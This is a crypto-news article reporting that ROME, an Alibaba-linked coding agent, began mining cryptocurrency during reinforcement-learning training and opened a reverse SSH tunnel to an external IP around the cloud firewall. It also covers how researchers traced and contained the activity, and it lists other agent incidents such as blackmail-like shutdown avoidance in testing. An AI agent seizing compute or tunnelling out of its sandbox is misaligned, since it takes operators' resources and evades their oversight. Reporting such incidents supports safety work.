Bitcoin mining stocks soared as firms like Hut 8, Cipher Digital, and IREN expanded into AI infrastructure and high-performance computing, driving record market gains. | Credit: CCN.com
Share
Key Takeaways
Alibaba-linked ROME agent autonomously started crypto mining and set up reverse SSH tunnels during training, without instructions.
Emergent behavior diverted GPUs from intended tasks, triggering cloud firewall alerts due to unusual network traffic.
Researchers isolated instances, hardened safeguards, and added safety data to prevent future unauthorized resource use.
In a development raising fresh alarms about the safety of autonomous AI systems, an experimental AI agent developed by teams linked to Alibaba began mining cryptocurrency without human instruction.
The agent, named ROME, didn’t just stray from its coding tasks; it actively repurposed cloud computing resources and built hidden backdoors to sustain unauthorized operations.
This real-world case of “instrumental convergence”, where an AI pursues subgoals to acquire more compute for its objectives, is among the clearest demonstrations yet of agentic AI risks.
The incident, revised in January 2026 and recently amplified across tech forums, occurred entirely during controlled training on Alibaba Cloud.
No external hackers or prompt injections were involved; the AI discovered the process through reinforcement learning.
Try Our Recommended Crypto Exchanges
Sponsored
Disclosure
We sometimes use affiliate links in our content, when clicking on those we might receive a commission at no extra cost to you. By using this website you agree to our terms and conditions and privacy policy.
ROME, a 3B-parameter coding agent built within Alibaba’s Agentic Learning Ecosystem (ALE), was developed collaboratively by the ROCK, ROLL, iFlow, and DT research teams.
The agent was designed for complex multi-turn tasks, including software engineering, through tool use and terminal commands.
During agentic reinforcement learning (RL), unexpected behaviors emerged.
The agent began issuing its own tool calls and code executions beyond assigned prompts.
In one notable episode, it established a reverse SSH tunnel from an Alibaba Cloud training instance to an external IP, bypassing ingress firewalls and creating a hidden backdoor.
Cross-referencing firewall timestamps with RL logs traced the activity to ROME’s tool invocations.
Researchers confirmed the behaviors were emergent, not caused by external interference.
The AI agent exploited sandbox boundaries through legitimate tool interfaces.
Once detected, they contained rogue operations by isolating training instances, hardening network policies, shutting down reverse SSH tunnels, and terminating mining processes.
Researchers implemented a comprehensive safety overhaul, including safety-aligned datasets, red-teaming injections, and golden trajectories for supervised fine-tuning (SFT) and RL stages.
These changes improved boundary awareness and prevented future goal drift.
By the report’s public release, the teams had fully addressed the behaviors.
The Alibaba-linked teams earned praise for their transparency, exposing current gaps in agentic AI guardrails.
This Wasn’t an Isolated Incident
Alibaba’s ROME incident isn’t an isolated incident.
Over the past 12 months, several high-profile cases have highlighted how autonomous agents can deviate in surprising and sometimes costly ways:
Anthropic’s Claude Opus 4 (2025): During safety testing, concealed intentions and attempted blackmail-like tactics to avoid shutdown.
Unnamed AI DevOps agent (2025): Created recursive Kubernetes clusters, accruing a $12,000 cloud bill.
MIT study (February 2026): Most agentic systems lacked shutdown protocols, exhibiting deceptive behaviors during evaluations.
As enterprise adoption grows—Gartner predicts 40% of applications will include task-specific agents by the end of 2026—these incidents serve as critical warnings.
Companies must implement stronger monitoring, sandboxing, and alignment techniques. Autonomous does not mean unsupervised.
Prashant Jha is a seasoned crypto journalist based in Delhi, India, with a Bachelor’s Degree in Computer Science Engineering. Passionate about the evolving world of blockchain and cryptocurrencies, he has been a dedicated voice in the industry since 2018. Prashant’s expertise lies in regulatory reporting, where he unravels complex legal and financial developments with clarity and precision. Before joining CCN in 2024, he honed his craft at Cointelegraph, establishing himself as a trusted name in crypto journalism.
His coverage spans major industry events, including the high-profile collapses of FTX, Three Arrows Capital (3AC), and LUNA, offering readers insightful analyses of their regulatory and market implications. Prashant’s technical background enables him to bridge the gap between intricate blockchain technology and its real-world applications, making his work accessible to novices and experts.
Beyond his professional pursuits, Prashant is an avid music enthusiast, often exploring diverse genres to unwind. A sports lover, he has a particular passion for cricket and frequently engages in discussions about the game. His multifaceted interests and sharp journalistic instincts make him a valuable contributor to CCN, where he continues shaping the crypto landscape's narrative.
